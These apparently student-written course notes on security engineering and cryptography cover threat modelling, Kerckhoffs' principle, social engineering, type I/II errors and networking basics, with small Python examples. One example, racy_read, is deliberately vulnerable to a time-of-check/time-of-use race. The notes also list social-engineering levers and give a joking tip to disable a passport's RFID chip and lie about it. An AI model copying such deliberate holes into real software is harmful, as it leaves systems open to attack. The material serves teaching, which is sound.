
TextBook

Contents 1 . TextBook 2 . Week1/NiceNotes 1 . Introduction 2 . Why do we need cryptography? 3 . Thinking Like a Security Engineer - Creating a Threat Model 4 . Cryptographic Properties 5 . Cryptographic Algorithms 6 . Why is cryptography hard? 3 . Week2/NiceNotes 1 . Security Design How Can We Build A Secure System? 2 . Security Terminology 3 . Kerckhoff's Principle 4 . Security Through Obscurity 5 . Threat Model 6 . Safety 7 . Types of Attacks 8 . Type I/II Errors 9 . Networking 1 . OSI Model 2 . TCP/IP 1 . DNS 2 . ARP 10. Hubs Versus Switches 4 . Week3/NiceNotes 1 . Confidentiality with Secret Keys 1 . Classical Techniques 1 . Substitution and Transposition 2 . Confusion and Diffusion 2 . Caesar Cipher 3 . Vigenere Cipher 4 . Playfair Cipher 2 . Attack Methods 1 . Anatomy of an attack 2 . Technical Attacks 1 . Side Channel Attacks 2 . Substitution Man-In-The-Middle Attack 3 . Cryptanalytic Attack 3 . Sniffing 5 . Week4/NiceNotes 1 . Modern Symmetric Ciphers 2 . Keys 3 . Speed 4 . Categories 1 . The S-Box - Substitution Cipher 2 . The P-Box - Permutation Cipher 3 . Stream Ciphers 4 . Block Ciphers 1 . Initialization Vector (IV) 2 . Feistel Cipher 3 . Padding 4 . DES 5 . AES 5 . Attack Methods 1 . Brute Force 2 . Differential Cryptanalysis 3 . The F Function

1 . E (Expansion function) 2 . The subkey 4 . Side Channel Attacks 5 . Replay attack 6 . Network Scans and Attacks 1 . Port Scanning 2 . Denial of Service 3 . ICMP flood 4 . Teardrop attack 5 . Peer-to-peer attacks 6 . Permanent denial-of-service attacks 7 . Application level floods 8 . Nuke 7 . Distributed attack 1 . Reflected attack 2 . Spoofing 3 . Exploits 1 . Registers x86 CPU 2 . Stack Overview 3 . Writing an exploit 4 . Other Exploits 5 . Buffer Overflow Countermeasures 6 . Week5/NiceNotes 1 . Hashing 1 . Hash Function 2 . Properties of a Hash Function 3 . Examples of Hashing 1 . MD5 2 . SHA family 3 . Hashed Message Authentication Code (HMAC) 4 . Casting Nines 4 . Hash Function Attacks 1 . Preimage Attack 2 . Birthday Attack 3 . Length Extension Attack 4 . Prefix Attack 5 . Intrusion Detection System 1 . Types of IDS 2 . Problems with IDS 2 . Firewalls 3 . Types Of Firewall 1 . Network Layer Firewalls 2 . Application Layer Firewall 3 . Proxies 4 . Network Address Translation 4 . Getting Around Firewalls 5 . Common firewall attacks 1 . Port Scanning Attack 2 . Denial-of-Service (DoS) Attack 1 . ICMP ping flood 2 . TCP SYN flood 3 . SSH Brute-Force Attack 4 . Spoofing Attack 1 . IP Address Spoofing 2 . DNS Cache Spoofing 5 . Christmas Tree Packets Attack 6 . Iptables 1 . General iptables concepts 2 . Commonly used targets (actions) 3 . General Iptables Switches 4 . Usage Examples 5 . Advanced Iptables Concepts 1 . Match Extensions 1 . Limit Module

2 . Recent Module 6 . Glossary 7 . Week6/NiceNotes 1 . Confidentiality with Public Keys 1 . Public Key Cryptography 2 . Types of Public Key Cryptography 3 . Public Key Cryptography in Practise 1 . Generating the Key 2 . Encrypting a Message 3 . Using Digital Signatures 4 . Diffie-Hellman Key Predistribution Scheme 4 . Public Key Encryption 1 . Merkle 2 . Diffie-Hellman 3 . RSA 5 . Digital Signatures 2 . Rootkits 1 . Classification 2 . Rootkit Lifecycle 1 . Installation 2 . Hiding 3 . Detection 4 . Removing 5 . Preventing 6 . Damage 3 . Tools for Rootkit Lab 1 . lsof 2. ps 3 . netstat 4 . top 5 . grep 6 . netcat 8 . Week7/NiceNotes 1 . Engineering Security 2 . PKI + SSL 1 . Public Key Infrastructure (PKI) 1 . Purpose 2 . Advantages 3 . Disadvantages 2 . PKI Architecture 3 . Tunneling 1 . What is Tunneling? 2 . How does encapsulation work for Tunneling? 3 . Why Tunneling? 4 . Common ways of Tunneling 5 . Stream vs. Datagram tunneling 6 . Tunneling Protocols 7 . Pros and cons of tunneling 8 . HTTP Tunneling 9 . SSH Tunnelling 10. Virtual Private Network (VPN) 11. IP Security (IPSec) 12. Transport Layer Security (TLS) / Secure Socket Layer (SSL) 9 . Week8/NiceNotes 1 . Risk 1 . What is Risk? 2 . Terminology 3 . Measuring Risk: 4 . Risk as a Cycle: 5 . Risk vs Uncertainty: 6 . Dealing with Risk 7 . Risk Analysis & Management: 8 . PKI: 2 . Protocol

1 . What is a protocol? 2 . Secret splitting: 3 . Cryptographic Protocols: 3 . Attacks on Cryptographic Protocols 4 . Cross-site Scripting (XSS) 1 . Server-side scripting 2 . Client-side scripting 3 . The Scripting Problem 4 . Cross-site scripting 5 . Type Of XSS Attacks 1 . Non-Persistent 2 . Persistent 6 . Defence Against XSS Attacks 1 . Server Defence 1 . Escaping 2 . Filtering 3 . Input Validation 4 . Eliminating Scripts 5 . Cookie Security 2 . User Defense 10. Week9/NiceNotes 1 . Threats 1 . Security Engineering Guideline 1 . Assets 2 . Example: Listing the assets for a home 3 . Example: Listing the assets for an ISP 2 . Threat Models 1 . Common Threat Classes 2 . Errors and Failures 3 . What happens when the red light goes on for the first time? 4 . Change 5 . Threat trees 6 . Dealing with threats 7 . Zero Knowledge Protocol 2 . Honeypot 1 . What is a honeypot 2 . Types of honeypots 3 . Uses of Honeypots 4 . Discovery of Honeypots 11. Week11/NiceNotes 1 . What is it like to work as a penetration tester? 1 . Fuzzing 2 . Open source vs Closed source 3 . Universities are 5 years behind 4 . Miscellaneous 5 . Conclusion 2 . Protocols (continued) and policy 1 . Non-repudiation 2 . Protocols of Election: Properties 1 . Example: Requirements for a protocol 2 . Flaws in Australia Election 3 . Example 2 4 . More on repudiation 5 . Adobe updater 3 . Zero-Knowledge Protocol 1 . Transcript of protocol 2 . Modes of operation 3 . Example 4 . Example 4 . DRM 5 . What is Digital Rights Management 6 . DRM System 7 . A Case Study - FairPlay (Apple iTunes Store) 1 . How it works

2 . Attacks on FairPlay 8 . Problems with DRM 9 . When DRM Goes Bad 10. Attacks on DRM 1 . Attack Methods 11. E-Books, PDFs and Word Documents 12. Trusted Computing & PS3's 13. DVD CSS: Content Scramble System 1 . LFSR 2 . The CSS Algorithm 3 . Attacks on CSS 1 . Brute Force 2^40 2 . Known Plaintext 2^25 3 . Other Attacks 12. Week12/NiceNotes 1 . Security Funding 1 . SCARE the #$^& out of your boss 2 . Why should we Care About Privacy? 2 . PGP 3 . Stealing Your Data 4 . 3rd party tracking 1 . CSS HACK 2 . COOKIES 3 . Forum Vulnerability 4 . EXTERNAL HOSTING 5 . FLASH COOKIES 5 . Google 1 . IP Tracking 2 . Cookie Tracking 6 . Law

Week1/NiceNotes
Introduction
'Cryptography' comes from Greek: kryptos - hidden or secret, graphein - to write.
  cryptography - science of designing secure communication methods
  cryptanalysis - science of breaking such methods
  steganography - science of hiding communication
  cryptology - cryptography + cryptanalysis
What is this subject about?
1. Security engineering.
2. Practical hands-on stuff.
3. Systems.

Why do we need cryptography?


Many internet services require privacy or security measures, including:
  Banking
  Shopping
  Tax returns
  Government
  Military
  Student records

Privacy is a crucial issue in many of these applications. Security means making sure that nosy people cannot read or secretly modify messages intended for other recipients.

Thinking Like a Security Engineer - Creating a Threat Model

"Think evil, act good!" - Adopt the mindset of an attacker.
How secure is your house?
How to steal Richard's bike, which is secured with a combination lock: cut the chain, pop the wheel, brute force the combination, offer to take the bike, watch Richard entering the combination, or guess the code (it is probably not random).
As defenders we have selective blindness, and the problem may be ill-defined. People often do not sit down and analyse their security needs; instead they buy the big, expensive, shiny security device. This is expensive, usually not very effective, and worse yet, often leads to a false sense of security.
Problems with security:
  Completely secure system vs. usability - the aim is to make the system reasonably secure
  Expected properties - reliance on a service that may be compromised
  Defending the wrong thing
  Defending against the wrong class of attacker
Questions to ask when considering a security system:
  What are they trying to defend against?
  What are the weakest links of this system?
  Are we relying on services that may be compromised?
  What types of attacks are likely to affect these systems?
  What sort of people are attacking?
  What resources do they have?
  Is it worth defending?
Classification of attackers may include:
  Hopeless individuals: script kiddies - a trend in the 90s
  Small criminal groups
  Large criminal groups/organisations - Russia, Asia
  Highly funded organisations: governments
In the last 5 years the number of attackers has increased and their ability has improved.
Types of attacks:
  Social engineering
  Technical attack
  Force

Cryptographic Properties
1. Confidentiality: It should be possible to send a message without anyone apart from the intended recipient reading it. The goal is to ensure that the adversary does not see or obtain the data (message) M.
  Example: A message M could be a credit card number being sent by shopper Alice to server Bob, and we want to ensure attackers don't learn it.
2. Authentication: It should be possible for the receiver of a message to ascertain its origin; an intruder should not be able to masquerade as someone else. The goal is to ensure that M really originates with Alice and not someone else. Multi-factor authentication significantly improves the security of a system. Generally speaking, if an attacker can break one part of a factor, then they can break everything in that factor.
  Authentication types:
    What you have - identification
    Who you are - biometric: face recognition or thumb print recognition
    What you know - password
3. Integrity: It should be possible for the receiver of a message to verify that it has not been modified in transit; an intruder should not be able to substitute a false message for a legitimate one. The goal is to ensure M has not been modified in transit.
  Together, authentication and integrity prevent an attacker Eve from:
    Modifying "Charlie" to "Eve" - Authenticity
    Modifying "$100" to "$1000" - Integrity
4. Non-repudiation: A sender should not be able to falsely deny later that he sent a message.
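As a rough illustration of the integrity and authentication goals above, the sketch below attaches a keyed tag (an HMAC, which these notes cover in a later week) to a message so that the receiver can detect a change such as "$100" becoming "$1000". The key, the message text and the function names are made up for the example. It assumes Alice and Bob already share a secret key, and it provides neither confidentiality nor non-repudiation.

```python
import hashlib
import hmac

def make_tag(key: bytes, message: bytes) -> bytes:
    """Sender side: compute a keyed tag over the message."""
    return hmac.new(key, message, hashlib.sha256).digest()

def verify(key: bytes, message: bytes, tag: bytes) -> bool:
    """Receiver side: recompute the tag and compare in constant time."""
    return hmac.compare_digest(make_tag(key, message), tag)

shared_key = b"example key known only to Alice and Bob"  # hypothetical key
original = b"Pay Charlie $100"
tag = make_tag(shared_key, original)

# What an attacker might substitute in transit, without knowing the key.
tampered = b"Pay Eve $1000"

print(verify(shared_key, original, tag))   # genuine message
print(verify(shared_key, tampered, tag))   # modified message
```

Because both parties hold the same key, either of them could have produced the tag, which is why this kind of check cannot settle a dispute about who sent the message.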

Cryptographic Algorithms

E: encryption algorithm D: decryption algorithm

Ke : encryption key Kd : decryption key

The best cryptographic algorithms are standardized, implemented and public!
Common types:
  public-key (asymmetric): Ke public, Kd secret
  private-key (symmetric): Ke = Kd, kept secret
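To make the E, D, Ke, Kd notation concrete, here is a toy symmetric scheme in which Ke = Kd and both E and D are a byte-wise XOR with the key. This is only a sketch for illustration: it assumes the key is random, as long as the message, and never reused, and it is not one of the standardized algorithms the notes recommend.

```python
import secrets

def E(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt by XOR-ing each plaintext byte with the matching key byte."""
    if len(key) != len(plaintext):
        raise ValueError("toy scheme: key must be exactly as long as the message")
    return bytes(k ^ p for k, p in zip(key, plaintext))

def D(key: bytes, ciphertext: bytes) -> bytes:
    """Decrypt: XOR is its own inverse, so D is the same operation as E."""
    return E(key, ciphertext)

message = b"attack at dawn"
key = secrets.token_bytes(len(message))  # Ke = Kd, shared secretly in advance
ciphertext = E(key, message)

print(D(key, ciphertext))
```

In a public-key scheme the same round trip holds, but E uses the public Ke while D needs the secret Kd.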

Sample application of the three cryptographic techniques for secure communication.

Design concerns:
  How to define security goals?
  How to design E, D?
  How to gain confidence that E, D achieve our goals?
A great number of designs try to produce algorithms without first asking "What is the security goal?" This leads to algorithms that are complex, unclear and wrong.

Why is cryptography hard?


One cannot anticipate an adversary's strategy in advance; the number of possibilities is infinite. "Testing" is not possible in this setting.
Additional References:
Types of people: "hackers", "crackers", "black hats", "script kiddies":
  Hacker - The term "Hacker" may mean simply a person with mastery of computers. However, the mass media most often uses "Hacker" as synonymous with a (usually criminal) computer intruder. In computer security, several subgroups with different attitudes and aims use different terms to demarcate themselves from each other, or try to exclude some specific group with which they do not agree.
  White hat - Breaks security for altruistic or at least non-malicious reasons.
  Grey hat - Hacker of ambiguous ethics and/or borderline legality, often frankly admitted.
  Blue Hat - Someone from outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.
  Black Hat - Someone who subverts computer security without authorization or who uses technology (usually a computer or the Internet) for terrorism, vandalism (malicious destruction), credit card fraud, identity theft, intellectual property theft, or many other types of crime. This can mean taking control of a remote computer through a network, or software cracking.
  Script kiddie - Person, usually not an expert in computer security, who breaks into computer systems by using pre-packaged automated tools.
  Hacktivist - Hacker who utilizes technology to announce a political message. Web vandalism is not necessarily hacktivism.

Week2/NiceNotes
Security Design How Can We Build A Secure System?
You cannot build a completely secure system and have it be usable. If you make a really secure system but it is cumbersome, then users will gleefully attempt to circumvent the system.
Security is a process. There is more to security than just building a secure system: it needs to be actively maintained, updated and operated. Over time, systems become decreasingly secure if left on their own.
The attacker has to find one hole; the defender has to protect all holes. Don't overestimate how secure you are.
We need to think like a bad guy and like a scientist, always trying to disprove what we know. Try to figure out what is wrong with a system, rather than trying to prove that it is correct/secure. Trying to prove it secure doesn't achieve anything for security, and only produces false peace of mind for those who build the 'secure' system.
Make yourself less attractive as a target than those around you.
Security bugs hide in complexity. A layering/abstraction approach reduces complexity, or at least compartmentalises it.
How secure does a cipher need to be?
  How long does the message need to be secure?
  Key length - 56 bits is not enough
  We don't make something impossible to crack, we just make it a LOT of work
Testing doesn't ensure safety, but it can give more confidence.
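The "a LOT of work" point can be put into numbers with a little arithmetic. The sketch below estimates the average brute-force time for a given key length. The search rate of 10^12 keys per second is an assumption chosen only for illustration, not a measured figure for any real attacker.

```python
SECONDS_PER_YEAR = 365 * 24 * 60 * 60

def years_to_search(key_bits: int, keys_per_second: float) -> float:
    """Average brute-force time: on average half the keyspace must be tried."""
    keys_to_try = 2 ** key_bits / 2
    return keys_to_try / keys_per_second / SECONDS_PER_YEAR

ASSUMED_RATE = 1e12  # hypothetical attacker speed, in keys per second

for bits in (40, 56, 128):
    years = years_to_search(bits, ASSUMED_RATE)
    print(f"{bits}-bit key: about {years:.3g} years on average")
```

At this assumed rate a 56-bit key falls in roughly ten hours on average, and each extra key bit doubles the work, which is why the question "how long does the message need to stay secure?" drives the choice of key length.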

Security Terminology
Assets - things you're trying to protect
Vulnerabilities - flaws in your security system that could be exploited (weaknesses)
Threats:
  nature - the actions performed by an attacker
  source - the person/group who would be performing the attack (threat model)

Different parts of a security system:
  Prevention - Deter the burglar from breaking in (stickers on your windows)
  Detection - Become aware a break-in is occurring (alarm). A detection system is useless unless there is an appropriate response.
  Response - Do something about the intrusion (back-to-base system)
  Users - Usually the weakest link in a security system; they can subvert the most advanced technical security measures
  Policy - Well-documented security policy, containing rules that staff will have to follow to keep the system secure. A small handbook is the only useful/realistic way to get people to obey a security policy.
  Environmental creep - Changes to the surrounding environment alter the security of our system. For example, a wall that used to be very secure may become less secure when a neighbour builds an awning from which someone could climb onto the wall.
  Chocolate security - A security system without multiple layers of defence. Similar to M&M's: hard on the outside, but soft on the inside. Thurston says that this is not always true: sometimes when you get through the hard layer, what is inside breaks your teeth, like peanut M&M's.
  Fault tolerant design - A fault in one subsystem doesn't bring down the whole system, only the part of the system where the fault occurs.

Kerckhoff's Principle
A cryptosystem should be secure even if everything about the system, except the key, is public knowledge. The law was one of six design principles laid down by Kerckhoffs for military ciphers:
1. The system must be practically, if not mathematically, indecipherable;
2. It must not be required to be secret, and it must be able to fall into the hands of the enemy without inconvenience;
3. Its key must be communicable and retainable without the help of written notes, and changeable or modifiable at the will of the correspondents;
4. It must be applicable to telegraphic correspondence;
5. It must be portable, and its usage and function must not require the concourse of several people;
6. Finally, it is necessary, given the circumstances that command its application, that the system be easy to use, requiring neither mental strain nor the knowledge of a long series of rules to observe.
Bruce Schneier ties it in with a belief that all security systems must be designed to fail as gracefully as possible. "Kerckhoffs' principle applies beyond codes and ciphers to security systems in general: every secret creates a potential failure point. Secrecy, in other words, is a prime cause of brittleness, and therefore something likely to make a system prone to catastrophic collapse. Conversely, openness provides ductility."

Security Through Obscurity


Security through obscurity is security attained by hiding your weakness.

Security through design is security attained by not having a weakness, by designing the system correctly in the first place. The problem with security through obscurity is that it rarely works. The secret is likely to leak eventually, and since there is no real security surrounding what is being protected, the adversary will have very little trouble gaining unauthorised access once the secret is lost. One of Kerckhoffs' principles for what makes a good cipher is very important here: It must not be required to be secret, and it must be able to fall into the hands of the enemy without inconvenience.

Threat Model
A threat model may be used to identify, categorise, and prioritise types of threat. A threat model is not a bottom-up thing (e.g. writing a shopping list of vulnerabilities). It is a top-down thing. You need to take a systematic approach to security:
  What are they trying to defend against?
  What are the weakest links of this system?
  Are we relying on services that may be compromised?
  What types of attacks are likely to affect these systems?
  What sort of people are attacking?
  What resources do they have?
  Is it worth defending?
A generic threat modelling process looks something like this:
1. Identify security objectives
2. Survey the application
3. Decompose it
4. Identify threats
5. Rate the threats
6. Identify vulnerabilities

Common Threat Classes: This is a non-comprehensive list of some of the common threat classes, not a thorough checklist. Your threat model should include (but is not limited to) the following classes of attacks:
  Users
    Unintentional attacks (by frustrated or stupid users)
    Malicious attacks
  Attackers
    Casual attackers
      Does not target this victim specifically
      Attacks the victim while scanning many other targets
    Determined attackers
      Targets the victim
      Has motive against the victim
      Tries to find vulnerabilities of the victim
    Funded attackers
      Like determined attackers, but also:
      Performs reconnaissance
      Hires people and purchases equipment to perform the attack
  Natural disasters / accidents
Assets: Listing the assets is the important first step in any security engineering exercise. You can only effectively defend something if you know exactly what it is that you are defending. It is very important to make a comprehensive list of assets before you start to identify the risks and implement a security policy.
  Obvious assets
    Valuable items
    Items of sentimental value
    The people in the house
    Sensitive data stored in the house
    The house itself
  Not-so-obvious assets - often overlooked, and often more important than the more obvious assets
    The sense of security (the feeling of safety within your house, which would be lost if there had been a break-in)
    The inconvenience of getting your insured items back
Example:
Question: An accountant has just resigned from his old partnership and is setting out on his own so he can spend more time with his family. He has set up a small home office and wants to connect it to his existing home broadband connection. He has a powerful desktop machine he will use for his work and is intending to buy a laptop and would like to have wireless access throughout the house. He has asked you to evaluate his security. Outline the threat model you will use.
Answering the question: What are the likely sources of attack? What are the likely assets to protect? Look at the context.
Assets (brainstorming). Remember to prioritise these:
  Client list
  Data
  Downtime (e.g. DoS attack)
  Infrastructure
  Family
  Identity (affects credibility)
The most important asset is his business. The next is his client data (if he loses it he can't do business any more). After that, maybe infrastructure (he may lose clients during downtime, as they will go elsewhere).
Sources of attack (brainstorming):

  Mafia
  Out of space
  Wireless (number 2) (possible solution: set up a separate subnet for wireless and family)
  Non-specific internet attacks, e.g. script kiddies (number 3)
  Old partners
  Family (number 1)
  Neighbours
  Burglars (they might steal his laptop and he may lose critical data)
Ordering:
1. His family are the number one source of attack. They wouldn't mean to cause problems, but they are on the same network, and they are going to let viruses in and bypass firewalls so they can play interactive games online. The kids' friends might use the computer. You should advise him to separate the networks if possible, otherwise to have a firewall with strict rules.
2. Wireless
3. Non-specific internet attacks

Safety
We can tell if a system is unsafe but we can't tell if it is safe. Take for example a train network. If a train crashes, we know the algorithm is incorrect. If trains don't crash, the algorithm might still be wrong; we just haven't detected the problem yet. Think about security the same way we think about safety: we need to use engineering principles to make it safe to a standard. Testing doesn't guarantee safety; it gives us confidence that the system is possibly safe.

Types of Attacks
There are three categories of attack:
1. Technical attacks
  Disclosure of data
  Corruption of data
  Denial of service
2. Force
3. Social engineering - Involves exploiting the weaknesses of people to achieve desired results. In most instances, it is an individual from within the target organisation who will inadvertently aid the attacker in his pursuit.
People are often the weakest point of a security system. Millions of dollars in encryption software, firewalls, padlocks, and a swipe card system can be bypassed by a single employee letting an attacker into the office.
Social engineers prey on basic human instincts and weaknesses. Some of these include:
  Greed - Alarm bells should ring in people's heads when they feel they are getting a better deal than other people, or getting something other people cannot. E.g. Nigerian Letter Scams.
  Helping people - Most of us won't have any qualms helping people 'swipe in' to labs after hours or opening the door from the inside. While this might not be a big issue with the CSE labs, the same mindset can see attackers gaining access to restricted areas in a company office.
  Apathy - ...who cares?

  Authority - If you sound important and look like you know what you're doing, you can get away with just about anything.
  Reciprocation - If someone gives us something, there is often a strong inclination to return the favour. Remarkably, this is the case even when we did not ask for the initial favour. This natural rule of reciprocation often leads to performing a task even costlier than the original.
Why is it difficult to control? Social engineering can be most dangerous in large organisations whose employees are relaxed about the information they relay to other 'insiders'. Large organisations have hundreds of employees, and it can be reasonably assumed that employees do not know all other employees by name/face/voice. However, in order for the company to run successfully, these employees must often interact and share important information. Thus when an employee is asked for information by a source that they assume is from within the organisation, he/she has no problem in providing that information.
State attacks: TOC/TOU attack (time of check, time of use attack) - If there is a time delay between the time a client's credentials are checked and the time this client is given access to a resource, then this creates a vulnerability that may be exploited (e.g. after the operating system checks that a particular file should be deleted, it may be possible for an attacker to swap this file for another before the delete command is executed).
RFID: Little circuits that broadcast information. Really neat in certain applications, but a double-edged sword. It is very insecure - that's how it was designed! They do not belong in a passport, yet they are now being added. Why? People can walk past and steal your passport details. Doesn't sound fun. Suggest you hit your new passport with a hammer and if anyone asks why the RFID doesn't work, say: "Oh! Really? I must have sat on it."
Similarly with access cards, it is incredibly easy for people to walk past and clone all your information. Very scary. Why isn't this more public? Because manufacturers are jerks (see: marketers, above). There is some evidence that Mythbusters were going to do a segment on this, but were gagged by lawyers.
Physical
  Richard says: "You need to have physical security or you have nothing". E.g. it's no good having a state of the art firewall if you leave the door unlocked, and somebody can simply walk in and pick up your computer. But if your physical security is cumbersome, then there is a danger that you prevent legitimate users from accessing the resource. The better the physical security, the more legitimate users will be locked out (this is an example of a type I/II error). Generally speaking, if you have really cumbersome security then you still may not be able to keep out the bad guys, as the legitimate users get so annoyed that they work against the system. This may cause the security system to break down.
  Other examples:
    Tailgating - someone swipes, and another person follows them in
    Keyboard - in a study each key was found to make a slightly different sound, so it may be possible to analyse someone's typing
  Person who has physical access wins.
  All physical security has type I and type II flaws.
  Don't rely on locks; nothing beats having a pair of eyes.
  Human element - it is so difficult to stop people allowing security to be broken, e.g. tailgating.
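The TOC/TOU attack described in this section can be reproduced in a few lines. The sketch below uses a different but analogous scenario to the delete example: a program checks that a file is marked PUBLIC and then reads it, and a simulated attacker swaps the file in the gap between the check and the use. The file names, the PUBLIC marker and the in_the_gap hook are all invented for the demonstration; a real attacker would race the program rather than be handed a hook.

```python
import os
import tempfile

def racy_read(path, in_the_gap=None):
    """Vulnerable: the check and the use open the path separately."""
    with open(path) as f:
        allowed = f.readline().startswith("PUBLIC")   # time of check
    if not allowed:
        return None
    if in_the_gap is not None:
        in_the_gap()                                   # attacker acts between check and use
    with open(path) as f:                              # time of use: path is looked up again
        return f.read()

def safer_read(path, in_the_gap=None):
    """Safer: read once, then check and use that same data."""
    with open(path) as f:
        data = f.read()
    if in_the_gap is not None:
        in_the_gap()                                   # the swap now comes too late
    return data if data.startswith("PUBLIC") else None

def demo(reader):
    """Run a reader while a simulated attacker swaps the file mid-operation."""
    with tempfile.TemporaryDirectory() as d:
        public = os.path.join(d, "note.txt")
        secret = os.path.join(d, "secret.txt")
        with open(public, "w") as f:
            f.write("PUBLIC\nhello\n")
        with open(secret, "w") as f:
            f.write("SECRET\npassword\n")
        swap = lambda: os.replace(secret, public)      # attacker's move
        return reader(public, swap)

print(repr(demo(racy_read)))    # leaks the secret file's contents
print(repr(demo(safer_read)))   # returns only the data that was checked
```

The general fix is the same in other settings: make the check and the use refer to the same object (here, the same bytes) so that nothing can change in between.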

Type I/II Errors

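When you are designing a study you want to minimise statistical errors, but if you design the study to reduce type I errors, then you increase the number of type II errors (and vice versa). Whether an error counts as type I or type II depends on how the hypothesis is phrased. In statistical terms, a type I error rejects a hypothesis that is actually true, and a type II error fails to reject a hypothesis that is actually false. In these notes the hypothesis is the "positive" case (for example, "this person is a legitimate user"), so generally speaking:
  Type I errors are false negatives. These occur when we reach a negative conclusion when we should have reached a positive conclusion.
  Type II errors are false positives. These occur when we reach a positive conclusion when we should have reached a negative conclusion.
Many statistics texts phrase the hypothesis the other way around (the hypothesis is "nothing is there"), in which case the labels swap and a type I error is called a false positive.
What are the chances that my statistics are incorrect?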

An example of type I and type II errors: Let's say we have facial recognition software. We want the software to let through a door the people who are supposed to be there (legitimate users) but to keep others out (attackers). If we set the facial recognition software such that a person's face must match exactly with the data stored in the system, then there may be times when a legitimate user is incorrectly refused entry (e.g. perhaps they have grown a beard). Let's call this a type I error. But if we then go back to the system and ease the match requirements, then it may let through attackers (who, for example, may look similar to a legitimate user). This would be a type II error. This example also demonstrates that if you try to reduce the type I errors then you may increase the chance of type II errors.
We were interested in errors in judgment about Type II and Type I errors. An example: The Day The Earth Stood Still
Basic outline: Aliens land on earth. They are greeted by the military. The alien holds out a communication device, which the soldiers take to be a weapon. They shoot the alien. The alien perishes.
What are the Type I and II errors here?

Action                       Kill Alien       Make Friends with Alien
Alien: "Let's be friends"    Type II Error    Yay!
Alien: "KILL-ALL-HUMANS"     Yay!             Type I Error

Generally, when talking about Type I and Type II errors in security, we refer to an increase in security, with the trade-off being a decrease in convenience. The more rigorous your system becomes, the more work the user has to do, and you have to be aware that the users may circumvent the security system just because it's too much trouble.
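The facial recognition trade-off above can be made concrete with a small calculation. The sketch below counts both kinds of error at different match thresholds, using the labelling from these notes (type I = legitimate user refused, type II = attacker admitted). The similarity scores are invented for illustration and do not come from any real system.

```python
def error_rates(threshold, legit_scores, attacker_scores):
    """Return (type I rate, type II rate) for a given match threshold."""
    refused_legit = sum(1 for s in legit_scores if s < threshold)
    admitted_attackers = sum(1 for s in attacker_scores if s >= threshold)
    return (refused_legit / len(legit_scores),
            admitted_attackers / len(attacker_scores))

# Made-up similarity scores (0 = no match, 1 = perfect match).
legit = [0.95, 0.90, 0.85, 0.70, 0.60]      # e.g. 0.60: the user has grown a beard
attackers = [0.20, 0.40, 0.55, 0.65, 0.75]  # e.g. 0.75: a lookalike

for t in (0.5, 0.8, 0.99):
    type_1, type_2 = error_rates(t, legit, attackers)
    print(f"threshold {t}: legit refused {type_1:.0%}, attackers admitted {type_2:.0%}")
```

Raising the threshold pushes errors from the second column into the first, and at some point legitimate users are refused so often that they start working around the system.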

Networking
Computer networking is the process of linking many computer users together so that they can communicate. Networking is often described with one of two models:
  OSI model - Open Systems Interconnection
  TCP/IP Internet Protocol Suite model
The OSI model has 7 layers and is an abstract model of how computer networking works. The TCP/IP Internet Protocol Suite model has 4 or 5 layers (depending on where you look), and is fairly similar to the OSI model, but it essentially rolls the application, presentation and session layers of the OSI model all into the Application layer. My understanding is that the OSI model is a theoretical model (usually taught in lectures) and the TCP/IP Internet Protocol Suite model is, practically speaking, what is used on the internet.
OSI Model versus TCP/IP Internet Protocol Suite Model

Communication protocol: Specification of a procedure for transferring information. Different communication protocols can be at different levels of abstraction. When you send data over a wire from one person to another and there are only 2 people you don't need a protocol, but when your message is going out over a system where there are many people then we need an addressing system...this is what TCP/IP does.

OSI Model
OSI is broken down into seven layers: Application Layer, Presentation Layer, Session Layer, Transport Layer, Network Layer, Data Link Layer, and Physical Layer. When a person communicates with another person on a network, the information passes through these layers. It begins at the Application Layer, works its way down to the Physical Layer on the sender's side, and then goes back up to the Application Layer on the receiver's side.

TCP/IP
TCP/IP consists of a stack of communication protocols for communicating across interconnected physical networks. Whereas IP handles lower-level transmissions from computer to computer as a message makes its way across the Internet, TCP operates at a higher level, concerned only with the two end systems, for example a Web browser and a Web server.
Characteristics of TCP/IP:
  Enables communication across any set of interconnected networks
  Hardware independent
  Universal connection
  End-to-end orientation
The layers are:
  Application Layer
  Transport Layer
  Internet Layer
  Network Interface Layer
  Hardware Layer
Note: All the layers except for the hardware layer are conceptual.
  Error detection and recovery are performed at the higher layers
  Intelligence is placed in the hosts, not in the physical networks
Protocol Layering Principle: The communication object received by layer n at the destination is exactly the same object sent by layer n at the source.
  Advantage of layering: clarity
  Disadvantage of layering: efficiency
In short, TCP/IP offers reliable transmission with error detection and recovery, but not authenticity (it can be spoofed) or encryption (it can be sniffed).
Application Layer
  Corresponds to the Session, Presentation, and Application Layers of the OSI Model
  Application programs access services across an internet
  Uses application software
  Example protocols: SMTP, Telnet, SSH, FTP, HTTP
Transport Layer
  Corresponds to the Transport Layer of the OSI Model
  Transmits messages from a client process to a server process
  Messages are converted into streams of packets
  Uses operating system software
  Uses ports for addressing packets
  Protocols: UDP, TCP
Internet Layer
  Corresponds to the Network Layer of the OSI Model
  Transmits packets from a source host to a destination host
  Packets are encapsulated in datagrams
  Uses operating system software
  Uses IP addresses for addressing
  Protocols: IP, ICMP, routing protocols
Network Interface Layer
  Corresponds to the Data Link Layer of the OSI Model
  Transmits datagrams from a source network interface to a destination network interface
  Datagrams are encapsulated in frames
  Uses device driver software
  Uses physical addresses for addressing
  Protocols: ARP, RARP
Hardware Layer
  Corresponds to the Physical Layer of the OSI Model
  Transmits communication signals over an SPN
  Uses network hardware
Example: Encapsulation of application data descending through the protocol stack.

Two Internet hosts connected via two routers and the corresponding layers used at each hop.

IP: The primary protocol in the Internet Layer of the Internet Protocol Suite. It has the task of delivering datagrams (packets) from the source host to the destination host solely based on their addresses. For this purpose the Internet Protocol defines addressing methods and structures for datagram encapsulation.

IP works by exchanging pieces of information called packets. A packet is a sequence of bytes and consists of a header followed by a body. The header describes the packet's destination and which routers on the Internet to use to pass the packet along, generally in the right direction, until it arrives at its final destination. The body contains the data which IP is transmitting. When IP is transmitting data on behalf of TCP, the content of the IP packet body is TCP data.

Some examples of internet protocols and the layers at which they are found:
Application: DNS, TFTP, TLS/SSL, FTP, Gopher, HTTP, IMAP, IRC, NNTP, POP3, SIP, SMTP, SNMP, SSH, Telnet, Echo, RTP, PNRP, rlogin, ENRP
Transport: TCP, UDP, DCCP, SCTP, IL, RUDP, RSVP
Internet: IP (IPv4, IPv6), ICMP, IGMP, ICMPv6
Link: ARP, RARP, OSPF (IPv4/IPv6), IS-IS, NDP

